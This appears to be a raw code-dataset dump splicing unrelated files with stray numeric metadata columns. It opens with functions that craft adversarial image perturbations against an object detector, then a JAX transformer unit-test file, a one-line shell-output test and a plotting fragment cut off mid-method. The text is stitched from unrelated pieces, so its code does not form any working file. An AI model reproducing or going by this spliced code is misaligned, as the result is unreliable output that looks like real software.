x_adv -= eps_iter * signed_grad
eta = np.clip(x_adv - x_query, -eps, eps)
x_adv = np.clip(x_query + eta, 0.0, 1.0)
return x_adv
def tog_mislabeling(victim, x_query, target, n_iter=10, eps=8/255., eps_iter=2/255.):
detections_query = victim.detect(x_query, conf_threshold=victim.confidence_thresh_default)
detections_target = generate_attack_targets(detections_query, confidence_threshold=victim.confidence_thresh_default,
mode=target)
eta = np.random.uniform(-eps, eps, size=x_query.shape)
x_adv = np.clip(x_query + eta, 0.0, 1.0)
for _ in range(n_iter):
grad = victim.compute_object_mislabeling_gradient(x_adv, detections=detections_target)
signed_grad = np.sign(grad)
x_adv -= eps_iter * signed_grad
eta = np.clip(x_adv - x_query, -eps, eps)
x_adv = np.clip(x_query + eta, 0.0, 1.0)
return x_adv
def tog_untargeted(victim, x_query, n_iter=10, eps=8/255., eps_iter=2/255.):
detections_query = victim.detect(x_query, conf_threshold=victim.confidence_thresh_default)
eta = np.random.uniform(-eps, eps, size=x_query.shape)
x_adv = np.clip(x_query + eta, 0.0, 1.0)
for _ in range(n_iter):
grad = victim.compute_object_untargeted_gradient(x_adv, detections=detections_query)
signed_grad = np.sign(grad)
x_adv -= eps_iter * signed_grad
eta = np.clip(x_adv - x_query, -eps, eps)
x_adv = np.clip(x_query + eta, 0.0, 1.0)
return x_adv
| 44.436364
| 121
| 0.652209
| 395
| 2,444
| 3.75443
| 0.134177
| 0.064734
| 0.056642
| 0.053945
| 0.826703
| 0.757923
| 0.757923
| 0.757923
| 0.757923
| 0.757923
| 0
| 0.038339
| 0.231588
| 2,444
| 54
| 122
| 45.259259
| 0.751331
| 0
| 0
| 0.73913
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.086957
| false
| 0
| 0.043478
| 0
| 0.217391
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
8fdaadbed269f800fcaeec79afadf5c05cdc9795
| 28,722
|
py
|
Python
|
Google/benchmarks/bert/implementations/bert-research-JAX-tpu-v4-2048/jax/layers/transformers_test.py
|
gglin001/training_results_v1.1
|
58fd4103f0f465bda6eb56a06a74b7bbccbbcf24
|
[
"Apache-2.0"
] | null | null | null |
Google/benchmarks/bert/implementations/bert-research-JAX-tpu-v4-2048/jax/layers/transformers_test.py
|
gglin001/training_results_v1.1
|
58fd4103f0f465bda6eb56a06a74b7bbccbbcf24
|
[
"Apache-2.0"
] | null | null | null |
Google/benchmarks/bert/implementations/bert-research-JAX-tpu-v4-2048/jax/layers/transformers_test.py
|
gglin001/training_results_v1.1
|
58fd4103f0f465bda6eb56a06a74b7bbccbbcf24
|
[
"Apache-2.0"
] | null | null | null |
# Lint as: python3
# Copyright 2021 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for lingvo Jax transformer layers."""
import itertools
from absl import logging
from absl.testing import absltest
from absl.testing import parameterized
import jax
from jax import numpy as jnp
from jax import test_util
from lingvo.core import batch_major_attention
from lingvo.jax import base_layer
from lingvo.jax import py_utils
from lingvo.jax import test_utils
from lingvo.jax.layers import attentions
from lingvo.jax.layers import transformers
import numpy as np
import tensorflow.compat.v2 as tf
class TransformersTest(test_util.JaxTestCase):
def setUp(self):
super().setUp()
np.random.seed(123456)
tf.random.set_seed(123)
@parameterized.parameters(*list(itertools.product([True, False], repeat=3)))
def test_transformer_layer(self, mask_self_attention, packed_input,
cross_attention):
p = transformers.TransformerLayer.Params().Set(
name='jax_transformer_layer',
input_dims=32,
hidden_dims=128,
num_heads=8,
mask_self_attention=mask_self_attention,
packed_input=packed_input,
cross_attention=cross_attention)
seq_len = np.random.randint(10, 32)
batch_size = 10
transformer_layer = p.Instantiate()
prng_key = jax.random.PRNGKey(seed=123)
initial_vars = transformer_layer.InstantiateVariables(prng_key)
npy_inputs = np.random.normal(
1.0, 0.5, [batch_size, seq_len, p.input_dims]).astype('float32')
inputs = jnp.asarray(npy_inputs)
npy_paddings = np.random.randint(0, 1,
[batch_size, seq_len]).astype('float32')
paddings = jnp.asarray(npy_paddings)
causal_mask = None
segment_mask = None
tf_segment_mask = None
attention_mask = attentions.ConvertPaddingsToMask(paddings)
if mask_self_attention:
causal_mask = attentions.CausalMask(inputs)
attention_mask = jnp.minimum(attention_mask, causal_mask)
if packed_input:
segment_ids = np.random.random_integers(0, 2, [batch_size, seq_len])
segment_mask = attentions.SegmentMask(segment_ids, dtype=np.float32)
attention_mask = jnp.minimum(attention_mask, segment_mask)
if mask_self_attention:
tf_segment_mask = batch_major_attention.CausalSegmentMask(
segment_ids, tf.float32)
else:
tf_segment_mask = batch_major_attention.SegmentMask(
segment_ids, segment_ids)
cross_inputs = None
cross_attention_mask = None
tf_cross_inputs = None
tf_cross_paddings = None
tf_cross_segment_mask = None
if cross_attention:
cross_seq_len = np.random.randint(10, 128)
npy_cross_inputs = np.random.normal(
1.0, 0.5, [batch_size, cross_seq_len, p.input_dims]).astype('float32')
cross_inputs = jnp.asarray(npy_cross_inputs)
tf_cross_inputs = tf.constant(npy_cross_inputs, dtype=tf.float32)
npy_cross_paddings = np.random.randint(
0, 1, [batch_size, cross_seq_len]).astype('float32')
cross_paddings = jnp.asarray(npy_cross_paddings)
cross_attention_mask = attentions.ConvertPaddingsToMask(cross_paddings)
tf_cross_paddings = tf.constant(npy_cross_paddings, dtype=tf.float32)
if packed_input:
source_segment_ids = np.random.random_integers(
0, 2, [batch_size, cross_seq_len])
cross_segment_mask = attentions.SegmentMask(
segment_ids, source_segment_ids, dtype=np.float32)
cross_attention_mask = jnp.minimum(cross_attention_mask,
cross_segment_mask)
tf_cross_segment_mask = batch_major_attention.SegmentMask(
segment_ids, source_segment_ids)
with base_layer.JaxContext.NewContext(
prng_key=prng_key, global_step=jnp.array(0, dtype=jnp.uint32)):
outputs, _ = transformer_layer.FProp(
initial_vars,
inputs,
paddings,
attention_mask=attention_mask,
cross_inputs=cross_inputs,
cross_attention_mask=cross_attention_mask)
logging.info('initial_vars in transformer layer = %s', initial_vars)
# Test whether tf Transformer layer returns same output
# Modify initial_vars to use TF compatible params
tf_initial_vars = test_utils.ReplaceJaxAttentionVarsToTf(
initial_vars, cross_attention)
tf_initial_vars = test_utils.ToTfNmap(tf_initial_vars)
logging.info('tf_initial_vars in transformer layer = %s', initial_vars)
tf_p = batch_major_attention.TransformerLayer.Params().Set(
name='tf_transformer_layer',
input_dim=p.input_dims,
num_heads=p.num_heads,
mask_self_atten=mask_self_attention,
packed_input=packed_input,
has_aux_atten=cross_attention)
tf_p.tr_fflayer_tpl.hidden_dim = p.hidden_dims
tf_p.tr_fflayer_tpl.fflayer_tpl.batch_norm = False
tf_p.tr_fflayer_tpl.fflayer_tpl.has_bias = True
tf_transformer_layer = tf_p.Instantiate()
tf_output, _ = tf_transformer_layer.FProp(
tf_initial_vars,
tf.constant(npy_inputs, dtype=tf.float32),
paddings=test_utils.ToTfNmap(npy_paddings),
segment_mask=tf_segment_mask,
aux_vec=tf_cross_inputs,
aux_paddings=tf_cross_paddings,
aux_segment_mask=test_utils.ToTfNmap(tf_cross_segment_mask))
np_outputs = test_utils.ToNp(outputs)
tf_np_outputs = test_utils.ToNp(tf_output)
self.assertAllClose(tf_np_outputs, np_outputs, atol=1e-5)
@parameterized.parameters((True, True), (False, True), (True, False),
(False, False))
def test_transformer_layer_extendstep(self, packed_input, cross_attention):
p = transformers.TransformerLayer.Params().Set(
name='jax_transformer_layer',
input_dims=8,
hidden_dims=32,
num_heads=4,
mask_self_attention=True,
packed_input=packed_input,
cross_attention=cross_attention)
seq_len = 5
batch_size = 4
transformer_layer = p.Instantiate()
prng_key = jax.random.PRNGKey(seed=123)
initial_vars = transformer_layer.InstantiateVariables(prng_key)
initial_states = transformer_layer.InitStates(initial_vars, batch_size,
seq_len)
npy_inputs = np.random.normal(
1.0, 0.5, [batch_size, seq_len, p.input_dims]).astype('float32')
inputs = jnp.asarray(npy_inputs)
npy_paddings = np.random.randint(0, 1,
[batch_size, seq_len]).astype('float32')
paddings = jnp.asarray(npy_paddings)
attention_mask = attentions.ConvertPaddingsToMask(paddings)
segment_mask = None
causal_mask = attentions.CausalMask(inputs)
attention_mask = jnp.minimum(causal_mask, attention_mask)
if packed_input:
segment_ids = np.random.random_integers(0, 2, [batch_size, seq_len])
segment_mask = attentions.SegmentMask(segment_ids, dtype=np.float32)
attention_mask = jnp.minimum(attention_mask, segment_mask)
cross_inputs = None
cross_paddings = None
cross_attention_mask = None
if cross_attention:
cross_seq_len = np.random.randint(10, 32)
npy_cross_inputs = np.random.normal(
1.0, 0.5, [batch_size, cross_seq_len, p.input_dims]).astype('float32')
cross_inputs = jnp.asarray(npy_cross_inputs)
npy_cross_paddings = np.random.randint(
0, 1, [batch_size, cross_seq_len]).astype('float32')
cross_paddings = jnp.asarray(npy_cross_paddings)
cross_attention_mask = attentions.ConvertPaddingsToMask(cross_paddings)
if packed_input:
source_segment_ids = np.random.random_integers(
0, 2, [batch_size, cross_seq_len])
cross_segment_mask = attentions.SegmentMask(
segment_ids, source_segment_ids, dtype=np.float32)
cross_attention_mask = jnp.minimum(cross_attention_mask,
cross_segment_mask)
with base_layer.JaxContext.NewContext(
prng_key=prng_key, global_step=jnp.array(0, dtype=jnp.uint32)):
fprop_outputs, _ = transformer_layer.FProp(
initial_vars,
inputs,
paddings,
attention_mask=attention_mask,
cross_inputs=cross_inputs,
cross_attention_mask=cross_attention_mask)
decoder_outputs = jnp.zeros(shape=[seq_len, batch_size, p.input_dims])
atten_states = initial_states
for t in range(seq_len):
attention_mask_t = attention_mask[:, :, t, :]
cross_attention_mask_t = cross_attention_mask
if cross_attention:
cross_attention_mask_t = cross_attention_mask[:, :, t, :]
cross_attention_mask_t = np.expand_dims(
cross_attention_mask_t, axis=2)
atten_states, encoded = transformer_layer.ExtendStep(
initial_vars,
atten_states,
inputs=inputs[:, t, :],
time_step=t,
attention_mask=attention_mask_t,
cross_inputs=cross_inputs,
cross_attention_mask=cross_attention_mask_t)
decoder_outputs = decoder_outputs.at[t].set(encoded)
decoder_out_transposed = jnp.transpose(decoder_outputs, [1, 0, 2])
logging.info('initial_vars in transformer layer = %s', initial_vars)
np_fprop_outputs = test_utils.ToNp(fprop_outputs)
np_decoder_outputs = test_utils.ToNp(decoder_out_transposed)
self.assertAllClose(np_fprop_outputs, np_decoder_outputs, atol=1e-5)
@parameterized.parameters((True, True, True), (True, False, True),
(True, True, False), (False, True, True),
(True, False, False), (False, True, False),
(False, False, True), (False, False, False))
def test_stacked_transformer_layer(self, mask_self_attention, packed_input,
cross_attention):
p = transformers.StackedTransformerLayers.Params().Set(
name='jax_stacked_transformer_layer',
model_dims=16,
hidden_dims=64,
num_heads=8,
mask_self_attention=mask_self_attention,
num_layers=4,
packed_input=packed_input,
cross_attention=cross_attention)
seq_len = np.random.randint(10, 32)
batch_size = 10
stacked_transformer_layer = p.Instantiate()
prng_key = jax.random.PRNGKey(seed=123)
initial_vars = stacked_transformer_layer.InstantiateVariables(prng_key)
npy_inputs = np.random.normal(
1.0, 0.5, [batch_size, seq_len, p.model_dims]).astype('float32')
inputs = jnp.asarray(npy_inputs)
npy_paddings = np.random.randint(0, 1,
[batch_size, seq_len]).astype('float32')
paddings = jnp.asarray(npy_paddings)
segment_mask = None
tf_segment_mask = None
if packed_input:
segment_ids = np.random.random_integers(0, 2, [batch_size, seq_len])
segment_mask = attentions.SegmentMask(segment_ids, dtype=np.float32)
if mask_self_attention:
tf_segment_mask = batch_major_attention.CausalSegmentMask(
segment_ids, tf.float32)
else:
tf_segment_mask = batch_major_attention.SegmentMask(
segment_ids, segment_ids)
cross_inputs = None
cross_paddings = None
cross_segment_mask = None
tf_cross_inputs = None
tf_cross_paddings = None
tf_cross_segment_mask = None
if cross_attention:
cross_seq_len = np.random.randint(10, 64)
npy_cross_inputs = np.random.normal(
1.0, 0.5, [batch_size, cross_seq_len, p.model_dims]).astype('float32')
cross_inputs = jnp.asarray(npy_cross_inputs)
tf_cross_inputs = tf.constant(npy_cross_inputs, dtype=tf.float32)
npy_cross_paddings = np.random.randint(
0, 1, [batch_size, cross_seq_len]).astype('float32')
cross_paddings = jnp.asarray(npy_cross_paddings)
tf_cross_paddings = tf.constant(npy_cross_paddings, dtype=tf.float32)
if packed_input:
source_segment_ids = np.random.random_integers(
0, 2, [batch_size, cross_seq_len])
cross_segment_mask = attentions.SegmentMask(
segment_ids, source_segment_ids, dtype=np.float32)
tf_cross_segment_mask = batch_major_attention.SegmentMask(
segment_ids, source_segment_ids)
with base_layer.JaxContext.NewContext(
prng_key=prng_key, global_step=jnp.array(0, dtype=jnp.uint32)):
outputs = stacked_transformer_layer.FProp(
initial_vars,
inputs,
paddings,
segment_mask=segment_mask,
cross_inputs=cross_inputs,
cross_paddings=cross_paddings,
cross_segment_mask=cross_segment_mask)
logging.info('initial_vars in transformer layer = %s', initial_vars)
# Test whether tf Transformer layer returns same output
# Modify initial_vars to use TF compatible params
tf_initial_vars = py_utils.NestedMap()
tf_initial_vars.x_layers = []
for jax_initial_vars in initial_vars.x_layers:
tf_layer_vars = test_utils.ReplaceJaxAttentionVarsToTf(
jax_initial_vars, cross_attention)
tf_initial_vars.x_layers.append(tf_layer_vars)
tf_initial_vars = test_utils.ToTfNmap(tf_initial_vars)
logging.info('tf_initial_vars in transformer layer = %s', initial_vars)
tf_p = batch_major_attention.StackedTransformerLayers.Params().Set(
name='tf_transformer_layer',
mdl_dim=p.model_dims,
hidden_dim=p.hidden_dims,
num_atten_heads=p.num_heads,
mask_self_atten=mask_self_attention,
num_layers=p.num_layers,
packed_input=packed_input,
has_aux_atten=cross_attention)
tf_p.transformer_layer_params_tpl.tr_fflayer_tpl.fflayer_tpl.batch_norm = (
False)
tf_p.transformer_layer_params_tpl.tr_fflayer_tpl.fflayer_tpl.has_bias = True
tf_stacked_transformer_layer = tf_p.Instantiate()
tf_output, _ = tf_stacked_transformer_layer.FProp(
tf_initial_vars,
test_utils.ToTfNmap(npy_inputs),
paddings=test_utils.ToTfNmap(npy_paddings),
segment_mask=test_utils.ToTfNmap(tf_segment_mask),
aux_vec=test_utils.ToTfNmap(tf_cross_inputs),
aux_paddings=test_utils.ToTfNmap(tf_cross_paddings),
aux_segment_mask=test_utils.ToTfNmap(tf_cross_segment_mask))
np_outputs = test_utils.ToNp(outputs)
tf_np_outputs = test_utils.ToNp(tf_output)
self.assertAllClose(tf_np_outputs, np_outputs, atol=1e-5)
@parameterized.parameters(*list(itertools.product([True, False], repeat=3)))
def test_repeated_stacked_xformer_layer(self, mask_self_attention,
packed_input, cross_attention):
model_dims = 16
p1 = transformers.StackedTransformerLayers.Params().Set(
name='jax_stacked_transformer_layer',
model_dims=model_dims,
hidden_dims=64,
num_heads=8,
mask_self_attention=mask_self_attention,
num_layers=4,
packed_input=packed_input,
cross_attention=cross_attention)
p2 = transformers.StackedTransformerLayersRepeated.Params().Set(
name='jax_stacked_transformer_layer_repeated',
model_dims=model_dims,
hidden_dims=64,
num_heads=8,
mask_self_attention=mask_self_attention,
num_layers=4,
packed_input=packed_input,
cross_attention=cross_attention)
seq_len = np.random.randint(10, 32)
batch_size = 10
stacked_transformer_layer = p1.Instantiate()
repeated_transformer_layer = p2.Instantiate()
prng_key = jax.random.PRNGKey(seed=123)
initial_vars = stacked_transformer_layer.InstantiateVariables(prng_key)
repeated_transformer_layer.InstantiateVariableConfigs()
def _StackVars(*args):
args = [x[jnp.newaxis, :] for x in args]
return jnp.vstack(args)
stacked_vars = py_utils.NestedMap(
repeat=py_utils.NestedMap(
sub=tf.nest.map_structure(_StackVars, *initial_vars.x_layers)))
npy_inputs = np.random.normal(
1.0, 0.5, [batch_size, seq_len, model_dims]).astype('float32')
inputs = jnp.asarray(npy_inputs)
npy_paddings = np.random.randint(0, 1,
[batch_size, seq_len]).astype('float32')
paddings = jnp.asarray(npy_paddings)
segment_mask = None
if packed_input:
segment_ids = np.random.random_integers(0, 2, [batch_size, seq_len])
segment_mask = attentions.SegmentMask(segment_ids, dtype=np.float32)
cross_inputs = None
cross_paddings = None
cross_segment_mask = None
if cross_attention:
cross_seq_len = np.random.randint(10, 64)
npy_cross_inputs = np.random.normal(
1.0, 0.5, [batch_size, cross_seq_len, model_dims]).astype('float32')
cross_inputs = jnp.asarray(npy_cross_inputs)
npy_cross_paddings = np.random.randint(
0, 1, [batch_size, cross_seq_len]).astype('float32')
cross_paddings = jnp.asarray(npy_cross_paddings)
if packed_input:
source_segment_ids = np.random.random_integers(
0, 2, [batch_size, cross_seq_len])
cross_segment_mask = attentions.SegmentMask(
segment_ids, source_segment_ids, dtype=np.float32)
with base_layer.JaxContext.NewContext(
prng_key=jax.random.PRNGKey(seed=1234),
global_step=jnp.array(0, dtype=jnp.uint32)):
outputs = stacked_transformer_layer.FProp(
initial_vars,
inputs,
paddings,
segment_mask=segment_mask,
cross_inputs=cross_inputs,
cross_paddings=cross_paddings,
cross_segment_mask=cross_segment_mask)
outputs_repeated = repeated_transformer_layer.FProp(
stacked_vars,
inputs,
paddings,
segment_mask=segment_mask,
cross_inputs=cross_inputs,
cross_paddings=cross_paddings,
cross_segment_mask=cross_segment_mask)
self.assertAllClose(outputs, outputs_repeated)
@parameterized.parameters(*list(itertools.product([True, False], repeat=5)))
def test_stacked_transformer_layer_extendstep(self, packed_input,
cross_attention,
enable_while_loop,
use_repeat_layer, combine_qkv):
if cross_attention and combine_qkv:
self.skipTest('combine_qkv optimization only works for self-attention')
if use_repeat_layer:
layer_params = transformers.StackedTransformerLayersRepeated.Params()
else:
layer_params = transformers.StackedTransformerLayers.Params()
p = layer_params.Set(
name='jax_transformer_layer',
model_dims=8,
hidden_dims=32,
num_heads=2,
mask_self_attention=True,
packed_input=packed_input,
cross_attention=cross_attention,
num_layers=2,
enable_while_loop=enable_while_loop)
p.transformer_layer_params_tpl.tr_atten_tpl.combine_qkv = combine_qkv
seq_len = 5
batch_size = 4
stacked_transformer_layer = p.Instantiate()
prng_key = jax.random.PRNGKey(seed=123)
initial_vars = stacked_transformer_layer.InstantiateVariables(prng_key)
initial_states = stacked_transformer_layer.InitStates(
initial_vars, batch_size, seq_len)
npy_inputs = np.random.normal(
1.0, 0.5, [batch_size, seq_len, p.model_dims]).astype('float32')
inputs = jnp.asarray(npy_inputs)
npy_paddings = np.random.randint(0, 1,
[batch_size, seq_len]).astype('float32')
paddings = jnp.asarray(npy_paddings)
attention_mask = attentions.ConvertPaddingsToMask(paddings)
segment_mask = None
if packed_input:
segment_ids = np.random.random_integers(0, 2, [batch_size, seq_len])
segment_mask = attentions.SegmentMask(segment_ids, dtype=np.float32)
cross_inputs = None
cross_paddings = None
cross_segment_mask = None
if cross_attention:
cross_seq_len = np.random.randint(10, 32)
npy_cross_inputs = np.random.normal(
1.0, 0.5, [batch_size, cross_seq_len, p.model_dims]).astype('float32')
cross_inputs = jnp.asarray(npy_cross_inputs)
npy_cross_paddings = np.random.randint(
0, 1, [batch_size, cross_seq_len]).astype('float32')
cross_paddings = jnp.asarray(npy_cross_paddings)
if packed_input:
source_segment_ids = np.random.random_integers(
0, 2, [batch_size, cross_seq_len])
cross_segment_mask = attentions.SegmentMask(
segment_ids, source_segment_ids, dtype=np.float32)
prng_key = jax.random.PRNGKey(seed=123)
global_step = jnp.array(0, dtype=jnp.uint64)
with base_layer.JaxContext.NewContext(
prng_key=prng_key, global_step=global_step):
fprop_outputs = stacked_transformer_layer.FProp(
initial_vars,
inputs,
paddings,
segment_mask=segment_mask,
cross_inputs=cross_inputs,
cross_paddings=cross_paddings,
cross_segment_mask=cross_segment_mask)
decoder_outputs = jnp.zeros(shape=[seq_len, batch_size, p.model_dims])
atten_states = initial_states
for t in range(seq_len):
segment_mask_t = attention_mask[:, :, t, :]
cross_segment_mask_t = cross_segment_mask
if segment_mask is not None:
segment_mask_t = jnp.minimum(segment_mask_t, segment_mask[:, :, t, :])
if cross_segment_mask is not None:
cross_segment_mask_t = cross_segment_mask[:, :, t, :]
atten_states, encoded = stacked_transformer_layer.ExtendStep(
initial_vars,
atten_states,
inputs=inputs[:, t, :],
time_step=t,
segment_mask=segment_mask_t,
cross_inputs=cross_inputs,
cross_paddings=cross_paddings,
cross_segment_mask=cross_segment_mask_t)
decoder_outputs = decoder_outputs.at[t].set(encoded)
decoder_out_transposed = jnp.transpose(decoder_outputs, [1, 0, 2])
logging.info('initial_vars in transformer layer = %s', initial_vars)
np_fprop_outputs = test_utils.ToNp(fprop_outputs)
np_decoder_outputs = test_utils.ToNp(decoder_out_transposed)
self.assertAllClose(np_fprop_outputs, np_decoder_outputs, atol=1e-5)
@parameterized.parameters((True, True), (False, True), (True, False),
(False, False))
def test_stacked_transformer_layer_while_loop(self, packed_input,
cross_attention):
num_layers = 2
p1 = transformers.StackedTransformerLayers.Params().Set(
name='jax_transformer_layer',
model_dims=8,
hidden_dims=32,
num_heads=2,
mask_self_attention=True,
packed_input=packed_input,
cross_attention=cross_attention,
num_layers=num_layers,
enable_while_loop=False)
p2 = transformers.StackedTransformerLayers.Params().Set(
name='jax_transformer_layer',
model_dims=8,
hidden_dims=32,
num_heads=2,
mask_self_attention=True,
packed_input=packed_input,
cross_attention=cross_attention,
num_layers=num_layers,
enable_while_loop=True)
seq_len = 5
batch_size = 4
layer1 = p1.Instantiate()
layer2 = p2.Instantiate()
prng_key = jax.random.PRNGKey(seed=123)
initial_vars = layer1.InstantiateVariables(prng_key)
layer2.InstantiateVariableConfigs()
npy_inputs = np.random.normal(
1.0, 0.5, [batch_size, seq_len, p1.model_dims]).astype('float32')
inputs = jnp.asarray(npy_inputs)
npy_paddings = np.random.randint(0, 1,
[batch_size, seq_len]).astype('float32')
paddings = jnp.asarray(npy_paddings)
segment_mask = None
if packed_input:
segment_ids = np.random.random_integers(0, 2, [batch_size, seq_len])
segment_mask = attentions.SegmentMask(segment_ids, dtype=np.float32)
cross_inputs = None
cross_paddings = None
cross_segment_mask = None
if cross_attention:
cross_seq_len = np.random.randint(10, 32)
npy_cross_inputs = np.random.normal(
1.0, 0.5,
[batch_size, cross_seq_len, p1.model_dims]).astype('float32')
cross_inputs = jnp.asarray(npy_cross_inputs)
npy_cross_paddings = np.random.randint(
0, 1, [batch_size, cross_seq_len]).astype('float32')
cross_paddings = jnp.asarray(npy_cross_paddings)
if packed_input:
source_segment_ids = np.random.random_integers(
0, 2, [batch_size, cross_seq_len])
cross_segment_mask = attentions.SegmentMask(
segment_ids, source_segment_ids, dtype=np.float32)
prng_key = jax.random.PRNGKey(seed=123)
global_step = jnp.array(0, dtype=jnp.uint64)
with base_layer.JaxContext.NewContext(
prng_key=prng_key, global_step=global_step):
fprop_outputs_1 = layer1.FProp(
initial_vars,
inputs,
paddings,
segment_mask=segment_mask,
cross_inputs=cross_inputs,
cross_paddings=cross_paddings,
cross_segment_mask=cross_segment_mask)
fprop_outputs_2 = layer2.FProp(
initial_vars,
inputs,
paddings,
segment_mask=segment_mask,
cross_inputs=cross_inputs,
cross_paddings=cross_paddings,
cross_segment_mask=cross_segment_mask)
np_fprop_outputs_1 = test_utils.ToNp(fprop_outputs_1)
np_fprop_outputs_2 = test_utils.ToNp(fprop_outputs_2)
logging.info('np_fprop_outputs_1: %s', np_fprop_outputs_1)
logging.info('np_fprop_outputs_2: %s', np_fprop_outputs_2)
self.assertAllClose(np_fprop_outputs_1, np_fprop_outputs_2)
def test_transformer_bert(self):
"""Test JAX and TF transformer on PTB."""
p = transformers.TransformerLm.Params().Set(
name='bert_lm',
model_dims=32,
hidden_dims=4 * 32,
num_heads=4,
num_layers=1,
vocab_size=52)
p.softmax_tpl.scale_sqrt_depth = True
batch_size = 8
seq_len = 512
bert_lm = p.Instantiate()
prng_key = jax.random.PRNGKey(seed=123)
initial_vars = bert_lm.InstantiateVariables(prng_key)
input_ids = jax.random.randint(
jax.random.PRNGKey(1234), [batch_size, seq_len], 0, 51)
input_paddings = jnp.zeros([batch_size, seq_len])
input_weights = jnp.ones([batch_size, seq_len])
input_segment_ids = jnp.ones([batch_size, seq_len])
input_segment_pos = jnp.tile(
jnp.arange(0, seq_len)[jnp.newaxis, :], [batch_size, 1])
labels = py_utils.NestedMap()
labels.class_ids = input_ids
labels.class_weights = input_weights
with base_layer.JaxContext.NewContext(
prng_key=jax.random.PRNGKey(seed=1234),
global_step=jnp.array(0, dtype=jnp.uint32)):
outputs = bert_lm.FProp(
initial_vars,
input_ids,
input_paddings,
labels=labels,
segment_ids=input_segment_ids,
segment_pos=input_segment_pos)
logging.info('outputs: %s', outputs)
@parameterized.parameters(('RELU',), ('GATED_SILU',))
def test_gated_ffwd(self, activation_function):
"""Test JAX and TF transformer on PTB."""
p = transformers.TransformerFeedForwardLayer.Params().Set(
name='ffwd',
input_dims=8,
hidden_dims=32,
activation=activation_function)
batch_size = 8
seq_len = 512
ffwd = p.Instantiate()
prng_key = jax.random.PRNGKey(seed=123)
initial_vars = ffwd.InstantiateVariables(prng_key)
inputs = jax.random.normal(
jax.random.PRNGKey(1234), [batch_size, seq_len, 8])
input_paddings = jnp.zeros([batch_size, seq_len])
with base_layer.JaxContext.NewContext(
prng_key=jax.random.PRNGKey(seed=1234),
global_step=jnp.array(0, dtype=jnp.uint32)):
outputs = ffwd.FProp(initial_vars, inputs, input_paddings)
logging.info('outputs: %s', outputs)
if __name__ == '__main__':
absltest.main()
| 42.11437
| 80
| 0.683727
| 3,626
| 28,722
| 5.068395
| 0.07722
| 0.04908
| 0.032212
| 0.021221
| 0.826205
| 0.793449
| 0.773207
| 0.753455
| 0.722385
| 0.700729
| 0
| 0.019601
| 0.225541
| 28,722
| 681
| 81
| 42.176211
| 0.8066
| 0.034642
| 0
| 0.703226
| 0
| 0
| 0.028744
| 0.007258
| 0
| 0
| 0
| 0
| 0.009677
| 1
| 0.016129
| false
| 0
| 0.024194
| 0
| 0.043548
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8febccaf8d552aad4e79fa7dbb83ba6ab02b36b6
| 149
|
py
|
Python
|
tests/test_simple_shell.py
|
jaden-git/simple-utils
|
8526ea9a8357665722627ab2c44da527c2884006
|
[
"Apache-2.0"
] | 1
|
2021-03-08T09:54:05.000Z
|
2021-03-08T09:54:05.000Z
|
tests/test_simple_shell.py
|
jaden-git/simple-utils
|
8526ea9a8357665722627ab2c44da527c2884006
|
[
"Apache-2.0"
] | null | null | null |
tests/test_simple_shell.py
|
jaden-git/simple-utils
|
8526ea9a8357665722627ab2c44da527c2884006
|
[
"Apache-2.0"
] | null | null | null |
import simple_utils
def test_dynamic_check_output():
assert simple_utils.shell.dynamic_check_output('cat assets/message.txt') == 'Hello World'
| 24.833333
| 93
| 0.791946
| 21
| 149
| 5.285714
| 0.761905
| 0.198198
| 0.324324
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.107383
| 149
| 5
| 94
| 29.8
| 0.834586
| 0
| 0
| 0
| 0
| 0
| 0.222973
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
8f0c1710b2a6ea940670b17d354459811d2e37e2
| 16,826
|
py
|
Python
|
utility_active.py
|
mikkelotzen/mikkel_tools
|
d3f4bc70f8863038b0216d47b0bd3cb830e63132
|
[
"BSD-3-Clause"
] | null | null | null |
utility_active.py
|
mikkelotzen/mikkel_tools
|
d3f4bc70f8863038b0216d47b0bd3cb830e63132
|
[
"BSD-3-Clause"
] | null | null | null |
utility_active.py
|
mikkelotzen/mikkel_tools
|
d3f4bc70f8863038b0216d47b0bd3cb830e63132
|
[
"BSD-3-Clause"
] | null | null | null |
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.ticker as tick
# Color
from matplotlib.colors import LinearSegmentedColormap
import cartopy.crs as ccrs
projection = ccrs.Mollweide(central_longitude=0)
import matplotlib.colors as colors
color_zesty_cbf = [(0.0, 0.10980392156862745, 0.30196078431372547),
(0.5019607843137255, 0.6862745098039216, 1.0),
(1, 1, 1),
(1.0, 0.5372549019607843, 0.30196078431372547),
(0.30196078431372547, 0.10196078431372549, 0.0)] # dark bluish -> bright blue -> white -> bright orange -> darker orange
cm_zesty_cbf = LinearSegmentedColormap.from_list("zesty_cbf", color_zesty_cbf, N=10001)
class MidpointNormalize(colors.Normalize):
def __init__(self, vmin=None, vmax=None, midpoint=None, clip=False):
self.midpoint = midpoint
colors.Normalize.__init__(self, vmin, vmax, clip)
def __call__(self, value, clip=None):
